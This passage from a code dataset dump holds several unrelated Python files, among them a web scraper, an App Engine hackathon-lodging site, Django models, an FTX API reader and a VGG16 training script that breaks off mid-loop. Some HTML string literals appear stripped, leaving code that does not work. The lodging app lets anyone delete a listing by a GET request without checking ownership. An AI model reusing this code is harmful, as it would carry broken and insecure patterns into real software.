approve_audit_info_on_bestbid(self, run_time):\n self.audit['timeline'][BESTBID]['timeline']['end'] = run_time\n\n def add_bestbid(self, bid):\n try:\n if self.approve_bid_on_bestbid(bid):\n LOGGER.info(\n \"Dutch winner id={bidder_id} placed bid {amount}\"\n \" on {time}\".format(**bid)\n )\n return True\n except Exception as e:\n LOGGER.info(\n \"Falied to update dutch winner. Error: {}\".format(\n e\n )\n )\n return e\n return False\n\n def switch_to_bestbid(self, stage):\n with utils.lock_bids(self), utils.update_auction_document(self):\n self.auction_document['current_phase'] = BESTBID\n run_time = utils.update_stage(self)\n self.audit['timeline'][BESTBID]['timeline']['start'] = run_time\n\n def end_bestbid(self, stage):\n with utils.update_auction_document(self):\n\n all_bids = deepcopy(self._bids_data)\n minimal_bids = []\n\n for bid_id in all_bids.keys():\n bid = get_latest_bid_for_bidder(all_bids[bid_id], bid_id)\n bid['bidder_name'] = self.mapping[bid['bidder_id']]\n minimal_bids.append(\n utils.prepare_results_stage(**bid)\n )\n minimal_bids = sorting_by_amount(minimal_bids)\n\n self.auction_document['results'] = minimal_bids\n run_time = utils.update_stage(self)\n self.approve_audit_info_on_bestbid(run_time)\n self.end_auction()\n","sub_path":"openprocurement/auction/insider/mixins.py","file_name":"mixins.py","file_ext":"py","file_size_in_byte":14789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"476997691","text":"import urllib.request\nimport urllib.parse\nimport re\n\n\ndef get_ganres_list():\n \"\"\"\n @brief get list of ganres from kinopoisk.ru\n\n @return The ganres list.\n \"\"\"\n with urllib.request.urlopen('https://www.kinopoisk.ru/top/lists/') as f:\n text = f.read().decode(\"utf8\")\n start = text.index(\"list_main js-rum-hero\")\n stop = text.index(r'', start)\n text = text[start + 28:stop]\n text = re.sub(r'\\ *<[/]*li.*\\n', '', text)\n text = re.sub(r'\\ *]*>', '', text).split(r'')\n ar = []\n for el in text:\n i = el.find('>')\n ar.append((el[10:i - 1], el[i + 1:-4]))\n\n return ar\n\nsort_type = { \n \"по порядку\" : \"order\",\n \"по году\" : \"year\",\n \"по названию\" : \"name\",\n \"по оригинальному названию\" : \"oname\",\n \"по рейтингу КиноПоиска\" : \"rating\",\n \"по рейтингу IMDb\" : \"rating_imdb\",\n \"по количеству оценок\" : \"votes\",\n \"по времени\" : \"runtime\"\n } \n\ndata = {\n \"level\": \"60\",\n \"list\": \"5\",\n \"_filtr\": \"all\",\n \"_sort\": sort_type[\"по порядку\"],\n \"page\": 2,\n \"_ord\": \"\"\n }\n\n \n\n\ndata = urllib.parse.urlencode(data).encode()\nreq = urllib.request.Request('https://www.kinopoisk.ru/top/lists/5/page/2', data, method=\"POST\")\n\nwith urllib.request.urlopen(req) as f:\n text = f.read().decode(\"utf8\")\n start = text.index(\"table id=\\\"itemList\")\n stop = text.index('/table', start)\n text = text[start: stop]\n print(text)\n","sub_path":"url_example.py","file_name":"url_example.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"552452485","text":"# In this program we are implementing the palindrome number\nnum=int(input(\"Enter a number:\"))\ntemp=num\nrev=0\n\nwhile(num>0):\n digit=num%10\n rev= rev*10+digit #storing the reversed number\n num //=10\n\nif(temp==rev):\n print(\"The number is palindrome!\")\nelse:\n print(\"Not a palindrome!\")","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":297,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"78310136","text":"from typing import List\n\n\nclass Solution:\n # swap\n #https://leetcode-cn.com/problems/shu-zu-zhong-zhong-fu-de-shu-zi-lcof/solution/jian-zhi-offer-mian-shi-ti-jing-xuan-tu-jie-03-shu/\n def findRepeatNumber(self, nums: List[int]) -> int:\n if not nums:\n return -1\n i = 0\n while i < len(nums):\n if nums[i] == i:\n i += 1\n continue\n if nums[nums[i]] == nums[i]: #索引 nums[i] 处的值也为 nums[i],即找到一组相同值,返回 nums[i] 即可\n return nums[i]\n nums[nums[i]], nums[i] = nums[i], nums[nums[i]]\n i += 1\n return -1\n def findRepeatNumber2(self, nums: List[int]) -> int:\n if not nums:\n return\n seen = set()\n for num in nums:\n if num in seen:\n break\n else:\n seen.add(num)\n return num\n\nsolution = Solution()\nprint(solution.findRepeatNumber([2, 3, 1, 0, 2, 5, 3]))","sub_path":"Offer/Offer3-findRepeatNumber.py","file_name":"Offer3-findRepeatNumber.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"293734731","text":"from ftx_client import FtxClient\nfrom fastapi import FastAPI\nfrom config import settings\n\napp = FastAPI()\n\napi_key = settings.api_key\napi_secret = settings.api_secret\n\n@app.get(\"/\")\ndef read_root():\n subaccounts = FtxClient(api_key=api_key, api_secret=api_secret).get_subaccounts();\n account_names = [''] + [s['nickname'] for s in subaccounts]\n\n accounts = []\n\n for name in account_names:\n payments = FtxClient(api_key=api_key, api_secret=api_secret,\n subaccount_name=name).get_funding_payments()\n accounts.append({\"name\": name, \"payments\": payments[:48]})\n\n all_balances = FtxClient(api_key=api_key, api_secret=api_secret).get_all_balances()\n\n all_usd_value = sum(\n balance['usdValue']\n for account_balances in all_balances.values()\n for balance in account_balances\n )\n return {\"accounts\": accounts, \"total\": all_usd_value}\n","sub_path":"ftx-api/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":912,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"160371820","text":"import cgi\nimport urllib\n\nfrom google.appengine.api import users\nfrom google.appengine.ext import ndb\n\nfrom lxml import html\nimport requests\n\nimport datetime\n\nfrom time import gmtime, strftime, strptime\n\nimport webapp2\n\nHEAD_STRING=\"\"\"\n\n\n\n\"\"\"\n\nINTRO = '''
\n
\n

a restful service

\n
\n \n\n\n

\n sleephacks is a web service that connects travelling Hackathon hackers with local residents in order to supply them with accomodation during the event.\n \n \n \n \n
\n
Make your hackathon sleep experience less like this
\n

And more like this
\n
\n Ever wanted a real bed, a warm shower, or a safe place to store your valuables while at a hackathon? Use sleephacks so you can relax, enjoy your hackathon, and focus on the code!\n

\n
\n
\n
\n'''\n\nHOMEPAGE='''\n\n\n \n \n \n \n \n sleephacks - Home\n\n \n \n\t\n\t\n\t\n \n \n \n \n \n
\n\t\t\t

\n\t\t\t\tsleephacks\n\t\t\t

\n\t\t
\n\t
\n\t\t
\n\t
\n\t
\n\t\t

\n %s\n
\n %s\n\t\t

\n\t
\n\n%s\n\n\t\n \n \n \n \n \n\n\n'''\n\n\nMAIN_PAGE_FOOTER_TEMPLATE = \"\"\"\\\n\n

Host a Hacker

\n\n
\n

Message

\n
\n
\n
\n

Which genders are you willing to accomodate?

\n All\n
\n Male\n
\n Female\n
\n Other (specify in message)\n
\n
\n

Will you charge to stay with you?

\n Yes\n
\n No\n

\n
\n
\n\n\n\"\"\"\n\n\n\nDEFAULT_HACKATHON_NAME = 'default_hackathon'\n\n# We set a parent key on the 'Availabilitys' to ensure that they are all\n# in the same entity group. Queries across the single entity group\n# will be consistent. However, the write rate should be limited to\n# ~1/second.\n\n\n\ndef hackathon_key(hackathon_name=DEFAULT_HACKATHON_NAME):\n \"\"\"Constructs a Datastore key for an Availability entity.\n\n We use hackathon_name as the key.\n \"\"\"\n return ndb.Key('Availability', hackathon_name)\n\nclass Attendee(ndb.Model):\n \"\"\"Sub model for representing an author.\"\"\"\n identity = ndb.StringProperty(indexed=False)\n name = ndb.StringProperty(indexed=False)\n email = ndb.StringProperty(indexed=True)\n rating = ndb.IntegerProperty(indexed=True)\n\n\nclass Availability(ndb.Model):\n \"\"\"A main model for representing an individual ContentEngine entry.\"\"\"\n attendee = ndb.StructuredProperty(Attendee)\n content = ndb.StringProperty(indexed=False)\n cost = ndb.StringProperty(indexed=True)\n gender = ndb.StringProperty(indexed=True)\n uID = ndb.StringProperty(indexed=True)\n deleted = ndb.BooleanProperty(indexed=True)\n #date = ndb.DateTimeProperty(auto_now_add=True)\n\n\n#class TestPage(webapp2.RequestHandler):\n# def get(self):\n# page = requests.get('http://mlh.io/seasons/f2015/events')\n# tree = html.fromstring(page.text)\n# events = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/h3/text()')\n# logos = tree.xpath('//div[@class=\"event-logo\"]/img/@src')\n# datesLongList = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/p/text()')\n#\n# dates = []\n#\n# for i in xrange(0,len(datesLongList),2):\n# dates.append(datesLongList[i])\n#\n# self.response.write(dates)\n\n##UPDATED\nclass HackathonPage(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n #self.redirect('/login')\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n\n self.response.write('''\n \t\n \t\t\n \t\t\n \t\tsleephacks - Pick your Hackathon\n\n \t\t\n \t\t\n \t\t\n \t\t\n \t\t\n \t\n \t\n \t\t
\n \t\t\t\n \t\t\t\n \t\t\t\n \t\t\t

\n \t\t\t\tsleephacks - Hackathons\n \t\t\t

\n\n \t\t\t\n \t\t\t\t'''+url_linktext+'''\n \t\t\t\n My Listings\n \t\t
\n \t\t\n \t\t\n\n \t\t
\n \n \n \t\t\t\t''')\n\n page = requests.get('http://mlh.io/seasons/f2015/events')\n tree = html.fromstring(page.text)\n events = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/h3/text()')\n logos = tree.xpath('//div[@class=\"event-logo\"]/img/@src')\n\n datesLongList = tree.xpath('//div[@class=\"event-wrapper\"]/a/div/p/text()')\n\n dates = []\n\n for i in xrange(0,len(datesLongList),2):\n dates.append(datesLongList[i])\n\n\n i = 0\n dictMonths = {'January':0,'February':31,'March':59,'April':90,'May':120,'June':151,'July':181,'August':212,'September':243,'October':273,'November':304,'December':334}\n for date,event,logo in zip(dates,events,logos):\n sections = date.split(\" \")\n dateStart = sections[1]\n daysPassed = dictMonths[sections[0]]\n daysStart = daysPassed + int(dateStart[:len(dateStart)-2])\n daysCurrent = dictMonths[datetime.datetime.now().strftime(\"%B\")] + int(datetime.datetime.now().strftime(\"%d\"))\n daysToEvent = daysStart - daysCurrent\n if (daysToEvent <= 21 and daysToEvent >= 0):\n i += 1\n self.response.write(\"\")\n if (i == 3):\n self.response.write(\"\")\n i = 0\n self.response.write(\"\")\n self.response.write(\"\")\n\nclass UserDashboard(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n\n extra_text = \"\"\n\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n extra_text = \"Please Log In to view your listings\"\n\n\n availabilities_query = Availability.query()#.order(-Availability.date)\n avail_filter = availabilities_query.filter(Availability.attendee.email==user.email()).filter(Availability.deleted==False)\n availabilities = avail_filter.fetch()\n\n self.response.write('''\n \n \n \n \n sleephacks - accomodation\n\n \n \n \n \n \n \n \t\n \n
\n \t \n
\n
\n
\n \t''' + extra_text)\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n\n # Ancestor Queries, as shown here, are strongly consistent\n # with the High Replication Datastore. Queries that span\n # entity groups are eventually consistent. If we omitted the\n # ancestor from this query there would be a slight chance that\n # Availability that had just been written would not show up in a\n # query.\n #availabilities_query = Availability.query(\n ## ancestor=hackathon_key(hackathon_name))#.order(-Availability.date)\n #availabilities_query = availabilities_query.filter(Availability.deleted==False)\n #availabilities = availabilities_query.fetch()\n\n\n for availability in availabilities:\n #'''if greeting.author:\n # author = greeting.author.email\n # if user and user.user_id() == greeting.author.identity:\n # author += ' (You)'\n # self.response.write('%s wrote:' % author)\n #else:\n # self.response.write('An anonymous person wrote:')'''\n\n self.response.write('''\n
\n \t

\n

Preferred Genders: %s | Cost: %s
\n \t

\n
\n
\n Message: %s\n
\n

Remove

\n
\n
\n\n \t
''' %\n (availability.gender, availability.cost, cgi.escape(availability.content), availability.uID))\n\n self.response.write('''
\n \t
\n \t\t
\n \t
\n ''')\n\n\n\n\n self.response.write('''\n \n ''')\n\n #for availability in availabilities:\n # self.response.write('
Message: %s
Preferred Genders: %s
Cost: %s
' %\n # (cgi.escape(availability.content), availability.gender, availability.cost))\n # self.response.write(\"

Remove

\" % availability.uID)\n\n #self.response.write('')\n\n#class CaptchaPage(webapp2.RequestHandler):\n# def get(self):\n\nclass Login(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n self.redirect(url)\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n self.redirect(url)\n\n##NONEED\nclass DeleteAvailability(webapp2.RequestHandler):\n def get(self):\n key = self.request.get('key')\n\n availabilities_query = Availability.query().filter(Availability.uID==key)\n\n for a in availabilities_query:\n a.deleted=True\n a.put()\n\n self.redirect('/profile')\n\n##UPDATED\nclass MainPage(webapp2.RequestHandler):\n def get(self):\n\n user = users.get_current_user()\n emailString = \"\"\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n\n else:\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login'\n emailString = \"Please log in to view contact details\"\n\n self.response.write('''\n \n \n \n \n sleephacks - accomodation\n\n \n \n \n \n \n \n \t\n \n
\n \t \n
\n
\n
\n \t''')\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n\n # Ancestor Queries, as shown here, are strongly consistent\n # with the High Replication Datastore. Queries that span\n # entity groups are eventually consistent. If we omitted the\n # ancestor from this query there would be a slight chance that\n # Availability that had just been written would not show up in a\n # query.\n availabilities_query = Availability.query(\n ancestor=hackathon_key(hackathon_name))#.order(-Availability.date)\n availabilities_query = availabilities_query.filter(Availability.deleted==False)\n availabilities = availabilities_query.fetch()\n\n\n for availability in availabilities:\n if user:\n emailString = availability.attendee.email\n #'''if greeting.author:\n # author = greeting.author.email\n # if user and user.user_id() == greeting.author.identity:\n # author += ' (You)'\n # self.response.write('%s wrote:' % author)\n #else:\n # self.response.write('An anonymous person wrote:')'''\n\n self.response.write('''\t
\n \t

\n
\n Preferred Genders: %s | Cost: %s\n \t

\n
\n

\n Message: %s\n

\n Contact:\n
\n %s\n
\n
\n\n \t
''' %\n (availability.gender, availability.cost, cgi.escape(availability.content), emailString))\n\n self.response.write('''
\n \t
\n \t\t
\n \t
\n
\n
''')\n\n # Write the submission form and the footer of the page\n sign_query_params = urllib.urlencode({'hackathon_name':\n hackathon_name})\n if user:\n self.response.write(MAIN_PAGE_FOOTER_TEMPLATE % (sign_query_params))\n else:\n self.response.write('''

Host a Hacker


Please log in to post a listing

''')\n\n self.response.write('''
\n
\n\n \n ''')\n#class HackathonLandingPage(webapp2.RequestHandler):\n# def post(self):\n\n##UPDATED\nclass HomePage(webapp2.RequestHandler):\n def get(self):\n user = users.get_current_user()\n browseText = \"\"\n if user:\n url = users.create_logout_url(self.request.uri)\n url_linktext = 'Logout'\n browseText = 'Browse Hackathons'\n else:\n #self.redirect('/login')\n url = users.create_login_url(self.request.uri)\n url_linktext = 'Login with Google'\n self.response.write(HOMEPAGE % (url, url_linktext, browseText, INTRO))\n\n##NONEED\nclass ContentEngine(webapp2.RequestHandler):\n def post(self):\n # We set the same parent key on the 'Availability' to ensure each\n # Availability is in the same entity group. Queries across the\n # single entity group will be consistent. However, the write\n # rate to a single entity group should be limited to\n # ~1/second.\n hackathon_name = self.request.get('hackathon_name',\n DEFAULT_HACKATHON_NAME)\n greeting = Availability(parent=hackathon_key(hackathon_name))\n\n if users.get_current_user():\n greeting.attendee = Attendee(\n identity=users.get_current_user().user_id(),\n email=users.get_current_user().email())\n\n greeting.content = self.request.get('content')\n greeting.cost = self.request.get('cost')\n greeting.gender = self.request.get('gender')\n greeting.deleted = False\n greeting.uID = hackathon_name + users.get_current_user().email()\n id = greeting.put()\n\n\n\n query_params = {'hackathon_name': hackathon_name}\n self.redirect('/hackathon?' + urllib.urlencode(query_params))\n\napp = webapp2.WSGIApplication([\n ('/login', Login),\n ('/hackathon', MainPage),\n ('/listing', HackathonPage),\n ('/', HomePage),\n ('/profile', UserDashboard),\n ('/delete', DeleteAvailability),\n ('/update', ContentEngine),\n], debug=True)\n","sub_path":"guestbook.py","file_name":"guestbook.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"146009295","text":"from django.db import models\nfrom django.core.urlresolvers import reverse, NoReverseMatch\n\n\nclass Menu(models.Model):\n name = models.CharField('Название меню', max_length=50,\n null=True, blank=True, unique=True)\n\n def __str__(self):\n return self.name\n\n\nclass Item(models.Model):\n name = models.CharField('Название пункта меню', max_length=100,\n null=True, blank=True)\n address = models.TextField('URL', null=True, blank=True)\n parent = models.ForeignKey('self', verbose_name='Родитель',\n null=True, blank=True, related_name='child')\n clear_address = models.TextField('Чистый URL', null=True, blank=True)\n lord_menu = models.ForeignKey('Menu', verbose_name='Меню', null=True,\n blank=True, related_name='my_lord')\n path = models.TextField('Путь к пункту', null=True, blank=True)\n\n class Meta:\n verbose_name = 'Пункт меню'\n verbose_name_plural = 'Пункты меню'\n\n def __str__(self):\n return self.name\n\n def save(self):\n super(Item, self).save()\n if self.parent:\n if self.parent.path:\n parent_path = self.parent.path\n else:\n parent_path = ''\n else:\n parent_path = ''\n self.path = str(parent_path) + ' ' + str(self.id)\n try:\n named_url = self.address.split()[0]\n arguments = [item for item in self.address.split()[1:]]\n self.clear_address = reverse(named_url, args=arguments)\n except NoReverseMatch:\n self.clear_address = self.address\n super(Item, self).save()\n\n def string_id(self):\n return str(self.id)\n","sub_path":"test_menu/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1820,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"125897874","text":"import pandas as pd\r\n\r\n#read the csv file using pandas -->\r\nreadDATA=pd.read_csv(\"Box_Office.csv\")\r\n\r\n# distinguish features and labels coloumns into NDArrays -->\r\ndays=readDATA.iloc[:, 0:1].values\r\nmoneyBahubali_Dangal=readDATA.iloc[:, 1:3].values\r\n\r\n#import class LinearRegression -->\r\nfrom sklearn.linear_model import LinearRegression\r\nobj=LinearRegression()\r\n#model training -->\r\nobj.fit(days, moneyBahubali_Dangal) \r\n\r\nday=10\r\n\r\n#Collection earned on day 10 --->\r\n\r\nCollection=obj.predict([[day]])\r\n\r\nbahubaliMoney, dangalMoney=Collection[0]\r\n\r\nif bahubaliMoney > dangalMoney:\r\n print(\"BAHUBALI 2 MONEY > DANGAL MONEY\".format(day))\r\nelse:\r\n print(\"DANGAL MONEY > BAHUBALI 2 MONEY\".format(day))\r\n ","sub_path":"day35.py","file_name":"day35.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"167326521","text":"import logging\nimport os.path\n\n# Django decorators\nfrom django.views.decorators import csrf\n# Settings\nfrom django.conf import settings\n\n# Local stuff\nfrom wp_main.utilities import responses\nfrom apps.phonewords import phone_words, pwtools\n\nfrom apps.models import wp_app\nlog = logging.getLogger('wp.apps.phonewords.views')\n\ntry:\n phonewordsapp = wp_app.objects.get(alias='phonewords')\n app_version = phonewordsapp.version\nexcept Exception as ex:\n log.error('Phonewords has no database entry!\\n'\n 'Version will be incorrect:\\n{}'.format(ex))\n app_version = '1.0.0'\n\n\n@csrf.csrf_protect\ndef view_index(request):\n \"\"\" Main view for phone words. \"\"\"\n\n reqargs = responses.get_request_args(request)\n if reqargs:\n # This request came with args, send it to view_results()\n return view_results(request, args=reqargs)\n else:\n # Basic index view.\n context = {\n 'version': app_version,\n 'hasargs': False,\n }\n return responses.clean_response(\n 'phonewords/index.html',\n context=context,\n request=request)\n\n\n@csrf.csrf_protect\ndef view_results(request, args=None):\n \"\"\" Process number/word given by request args. \"\"\"\n\n errors = None\n results = None\n total = None\n rawquery = args['query']\n if not rawquery:\n return responses.error404(request, msgs=('Invalid url args.', ))\n\n lookupfunc, query, method = get_lookup_func(rawquery)\n cache_used = False\n # Try cached results first (for numbers only)\n if method == 'number':\n cachedresult = pwtools.lookup_results(query)\n if cachedresult:\n cache_used = True\n log.debug('Using cached result: {}'.format(cachedresult))\n total = cachedresult.attempts\n results = pwtools.get_results(cachedresult)\n if results:\n # Cancel lookup, we have cached results.\n lookupfunc = None\n\n else:\n log.debug('No cached found for: {}'.format(query))\n\n if lookupfunc:\n # Get wp words file.\n wordfile = os.path.join(\n settings.BASE_DIR,\n 'apps/phonewords/words'\n )\n if os.path.isfile(wordfile):\n # Get results.\n try:\n rawresults = lookupfunc(query, wordfile=wordfile)\n except ValueError as exval:\n errors = exval\n except Exception as ex:\n log.error('Error looking up number: {}\\n{}'.format(query, ex))\n errors = ex\n else:\n # Good results, fix them.\n try:\n results, total = fix_results(rawresults)\n except Exception as ex:\n log.error('Error fixing results:\\n{}'.format(ex))\n errmsg = (\n 'Sorry, there was an error parsing the results.
{}'\n )\n errors = Exception(errmsg.format(ex))\n # Cache these results for later if its a number.\n if method == 'number' and (not cache_used):\n pwtools.save_results(query, results, total)\n else:\n log.error('missing word file: {}'.format(wordfile))\n errors = Exception('Can\\'t find word file!')\n\n # Return response.\n context = {\n 'version': app_version,\n 'hasargs': True,\n 'query': args['query'],\n 'results': results,\n 'errors': errors,\n 'total': total,\n }\n\n return responses.clean_response(\n 'phonewords/index.html',\n context=context,\n request=request)\n\n\ndef fix_results(results):\n \"\"\" Fixes results from phone_words.get_phonenumber and\n phone_words.get_phonewords so they return the same types.\n \"\"\"\n\n if isinstance(results, dict):\n # Phonenumber results, only returns one thing.\n return results, 1\n elif isinstance(results, (list, tuple)):\n # Phonewords results, ({number: word}, totalcount)\n return results[0], results[1]\n else:\n # Shouldn't get here.\n return results, 0\n\n\ndef get_lookup_cmd(query):\n \"\"\" Determines cmdline args needed to run phonewords,\n uses -r if a word was given, and normal if a number was given.\n \"\"\"\n\n if query and ('-' in query):\n query = query.replace('-', '')\n\n lookupmethod = get_lookup_method(query)\n if lookupmethod:\n argmap = {'word': [query, '-r', '-p'],\n 'number': [query, '-p'],\n }\n return argmap.get(lookupmethod, None), query, lookupmethod\n # no lookup args for that query.\n return None, query, lookupmethod\n\n\ndef get_lookup_func(query):\n \"\"\" Determines if this is a word or number lookup,\n returns the proper function.\n If no query is given, returns None.\n \"\"\"\n if query and ('-' in query):\n query = query.replace('-', '')\n\n lookupmethod = get_lookup_method(query)\n if lookupmethod:\n funcmap = {'word': phone_words.get_phonenumber,\n 'number': phone_words.get_phonewords,\n }\n return funcmap.get(lookupmethod, None), query, lookupmethod\n # no lookup method for that query\n return None, query, lookupmethod\n\n\ndef get_lookup_method(query):\n \"\"\" Get lookup args depending query type (number or word)\n Returns 'number', 'word', or None (for bad-query)\n \"\"\"\n # Trim characters from query.\n if query:\n query = query.replace('-', '').strip()\n\n querytype = None\n # Still have query after trimming, determine method.\n if query:\n try:\n intval = int(query)\n query = str(intval)\n except ValueError:\n querytype = 'word'\n else:\n querytype = 'number'\n\n return querytype\n","sub_path":"apps/phonewords/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"441808577","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport torchvision\nfrom torchvision import transforms\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\n\nimport cv2\nimport os\nimport tqdm as tq\nimport scipy.io\n\n\ndef read_annotation_file(file_path):\n f = open(file_path, \"r\")\n data = f.read()\n data = data.split('\\n')\n x_min = int(data[18].split('<')[1].split('>')[1])\n y_min = int(data[19].split('<')[1].split('>')[1])\n x_max = int(data[20].split('<')[1].split('>')[1])\n y_max = int(data[21].split('<')[1].split('>')[1])\n return x_min, y_min, x_max, y_max\n\n\n# paths\npath_to_save_results_ephoc = 'runs/exp31_SGD_ep_bz_128'\npath_to_save_results_batch = 'runs/exp31_SGD_bt_bz_128'\npath_data_set = './data_set'\npath_images_data = os.path.join(path_data_set, 'Images')\npath_annotation = os.path.join(path_data_set, 'Annotation')\npath_test_list = os.path.join(path_data_set, 'test_list.mat')\npath_train_list = os.path.join(path_data_set, 'train_list.mat')\n\n# read test and train lists\ntest_list = scipy.io.loadmat(path_test_list)\ntrain_list = scipy.io.loadmat(path_train_list)\n\n# remove unnesscery keys\nto_remove = ['__header__', '__version__', '__globals__']\nfor rem in to_remove:\n test_list.pop(rem)\n train_list.pop(rem)\n\n# reduce dims for dataFrame\nfor key in test_list.keys():\n test_list[key] = np.squeeze(test_list[key])\n train_list[key] = np.squeeze(train_list[key])\n\n# create dataFrames for tests and lists\ntest_data_table = pd.DataFrame(data=test_list)\ntrain_data_table = pd.DataFrame(data=train_list)\n\n# add full paths to ims\ntest_data_table['file_list'] = test_data_table['file_list'].apply(lambda x: os.path.join(path_images_data, x.item()))\ntrain_data_table['file_list'] = train_data_table['file_list'].apply(lambda x: os.path.join(path_images_data, x.item()))\n\n# add full paths to annotation\ntest_data_table['annotation_list'] = test_data_table['annotation_list'].apply(lambda x: os.path.join(path_annotation, x.item()))\ntrain_data_table['annotation_list'] = train_data_table['annotation_list'].apply(lambda x: os.path.join(path_annotation, x.item()))\n\n# convert labels to start from 0\ntest_data_table['labels'] = test_data_table['labels'].apply(lambda x: x - 1)\ntrain_data_table['labels'] = train_data_table['labels'].apply(lambda x: x - 1)\n\n# shuffle the data\ntest_data_table = test_data_table.sample(frac=1)\ntrain_data_table = train_data_table.sample(frac=1)\n\ntransform = transforms.Compose([transforms.ToTensor(), transforms.Normalize((0.5, 0.5, 0.5), (0.5, 0.5, 0.5))])\nwriter_e = SummaryWriter(log_dir=path_to_save_results_ephoc)\nwriter_b = SummaryWriter(log_dir=path_to_save_results_batch)\n\ndata_train = []\nlabels_train = []\ndata_test = []\nlabels_test = []\n\nfor i in tq.tqdm(test_data_table.index):\n annotation_path = test_data_table['annotation_list'][i]\n x_min, y_min, x_max, y_max = read_annotation_file(annotation_path)\n\n im_path = test_data_table['file_list'][i]\n frame = cv2.imread(im_path)\n frame = frame[y_min:y_max, x_min:x_max, :]\n frame = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_AREA)\n frame = transform(frame)\n data_test.append(frame)\n\n label = test_data_table['labels'][i]\n labels_test.append(torch.tensor(label))\n\nfor i in tq.tqdm(train_data_table.index):\n annotation_path = train_data_table['annotation_list'][i]\n x_min, y_min, x_max, y_max = read_annotation_file(annotation_path)\n\n im_path = train_data_table['file_list'][i]\n frame = cv2.imread(im_path)\n frame = frame[y_min:y_max, x_min:x_max, :]\n frame = cv2.resize(frame, (224, 224), interpolation=cv2.INTER_AREA)\n frame = transform(frame)\n data_train.append(frame)\n\n label = train_data_table['labels'][i]\n labels_train.append(torch.tensor(label))\n\ndata_test = torch.stack(data_test)\nlabels_test = torch.stack(labels_test)\ndata_train = torch.stack(data_train)\nlabels_train = torch.stack(labels_train)\n\nmodel = torchvision.models.vgg16(pretrained=True)\nin_featurs = model.classifier[6].in_features\nmodel.classifier[6] = nn.Linear(in_features=in_featurs, out_features=120, bias=True)\n\n# Hyper Parameters\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda:0\" if use_cuda else \"cpu\")\nmodel = model.to(device)\n\nEPHOC = 40\nlr = 0.01\nbz = 128\nloss_fn = nn.CrossEntropyLoss()\noptim = torch.optim.SGD(model.parameters(), lr=lr)\n\nlen_data_train = len(data_train)\nlen_data_test = len(data_test)\n\ntrain_num_of_batches = len_data_train//bz\ntest_num_of_batches = len_data_test//bz\n\nloss_train_list = []\nacc_train_list = []\nloss_test_list = []\nacc_test_list = []\n\nfor ephoc in range(EPHOC):\n temp_loss_train_list = []\n temp_acc_train_list = []\n temp_loss_test_list = []\n temp_acc_test_list = []\n\n for i in tq.tqdm(range(train_num_of_batches + 1)):\n if i == train_num_of_batches:\n if not (i * bz == len(data_train)):\n in_data = data_train[i*bz:]\n lab = labels_train[i*bz:]\n else:\n in_data = data_train[i * bz:(i + 1)*bz]\n lab = labels_train[i * bz:(i + 1) * bz]\n\n in_data = in_data.to(device)\n lab = lab.to(device)\n\n pred = model(in_data)\n loss = loss_fn(pred, lab)\n\n optim.zero_grad()\n loss.backward()\n optim.step()\n\n output_class = torch.argmax(pred, dim=1)\n acc = torch.mean((lab.to(device) == output_class).type(torch.float32))\n\n temp_loss_train_list.append(loss.to(\"cpu\").item())\n temp_acc_train_list.append(acc.to(\"cpu\").item())\n\n writer_b.add_scalar('Loss/train', temp_loss_train_list[-1])\n writer_b.add_scalar('Accuracy/train', temp_acc_train_list[-1])\n\n with torch.no_grad():\n for i in tq.tqdm(range(test_num_of_batches + 1)):\n if i == test_num_of_batches:\n if not(i*bz == len(data_test)):\n in_data = data_test[i * bz:]\n lab = labels_test[i * bz:]\n else:\n in_data = data_test[i * bz:(i + 1) * bz]\n lab = labels_test[i * bz:(i + 1) * bz]\n in_data = in_data.to(device)\n lab = lab.to(device)\n\n pred = model(in_data)\n loss = loss_fn(pred, lab)\n\n output_class = torch.argmax(pred, dim=1)\n acc = torch.mean((lab.to(device) == output_class).type(torch.float32))\n\n temp_loss_test_list.append(loss.to(\"cpu\").item())\n temp_acc_test_list.append(acc.to(\"cpu\").item())\n\n writer_b.add_scalar('Loss/test', temp_loss_test_list[-1])\n 